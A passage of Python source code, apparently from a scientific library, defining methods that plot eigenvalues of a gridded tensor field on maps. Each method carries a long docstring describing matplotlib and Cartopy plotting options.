xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_i1(projection=projection, ax=ax.flat[1],
tick_interval=tick_interval, cb_offset=cb_offset,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_i2(projection=projection, ax=ax.flat[2],
tick_interval=tick_interval, cb_offset=cb_offset,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_i(projection=projection, ax=ax.flat[3],
tick_interval=tick_interval, cb_offset=cb_offset,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
fig.tight_layout(pad=0.5)
if fname is not None:
fig.savefig(fname)
return fig, ax
def plot_eig1(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the first eigenvalue of the tensor.
Usage
-----
x.plot_eig1([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_1$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eig1_label
if self.eig1 is None:
self.compute_eig()
return self.eig1.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_eig2(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the second eigenvalue of the tensor.
Usage
-----
x.plot_eig2([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_2$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eig2_label
if self.eig1 is None:
self.compute_eig()
return self.eig2.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_eig3(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the third eigenvalue of the tensor.
Usage
-----
x.plot_eig3([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_3$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eig3_label
if self.eig1 is None:
self.compute_eig()
return self.eig3.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_eigs(self, projection=None, tick_interval=[60, 60],
minor_tick_interval=[30, 30], xlabel='',
ylabel='', colorbar='bottom', cmap='viridis',
cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=9,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=8, show=True,
ax=None, fname=None):
"""
Plot the three eigenvalues of the tensor.
Usage
-----
x.plot_eigs([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, colorbar, cmap, cmap_limits, cmap_reverse,
cb_triangles, cb_label, cb_ylabel, cb_tick_interval,
cb_minor_tick_interval, cb_offset, cb_width, grid,
axes_labelsize, tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [60, 60]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = ''
Label for the longitude axis.
ylabel : str, optional, default = ''
Label for the latitude axis.
colorbar : str, optional, default = 'bottom'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = None
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
axes_labelsize : int, optional, default = 9
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = 8
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if colorbar is not None:
if colorbar in set(['bottom', 'top']):
scale = 2.3
else:
scale = 1.4
else:
scale = 1.65
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
fig, ax = _plt.subplots(3, 1, figsize=figsize)
self.plot_eig1(projection=projection, ax=ax.flat[0],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_eig2(projection=projection, ax=ax.flat[1],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_eig3(projection=projection, ax=ax.flat[2],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
fig.tight_layout(pad=0.5)
if fname is not None:
fig.savefig(fname)
return fig, ax
def plot_eigh1(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=None,
show=True, ax=None, fname=None):
"""
Plot the first eigenvalue of the horizontal tensor.
Usage
-----
x.plot_eigh1([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize,
tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_{h1}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eigh1_label
if self.eigh1 is None:
self.compute_eigh()
return self.eigh1.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_eigh2(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=None,
show=True, ax=None, fname=None):
"""
Plot the second eigenvalue of the horizontal tensor.
Usage
-----
x.plot_eigh2([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize,
tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_{h2}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eigh2_label
if self.eigh1 is None:
self.compute_eigh()
return self.eigh2.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_eighh(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=None,
show=True, ax=None, fname=None):
"""
Plot the maximum absolute value eigenvalue of the horizontal tensor.
Usage
-----
x.plot_eighh([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize,
tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_{hh}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eighh_label
if self.eigh1 is None:
self.compute_eigh()
return self.eighh.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
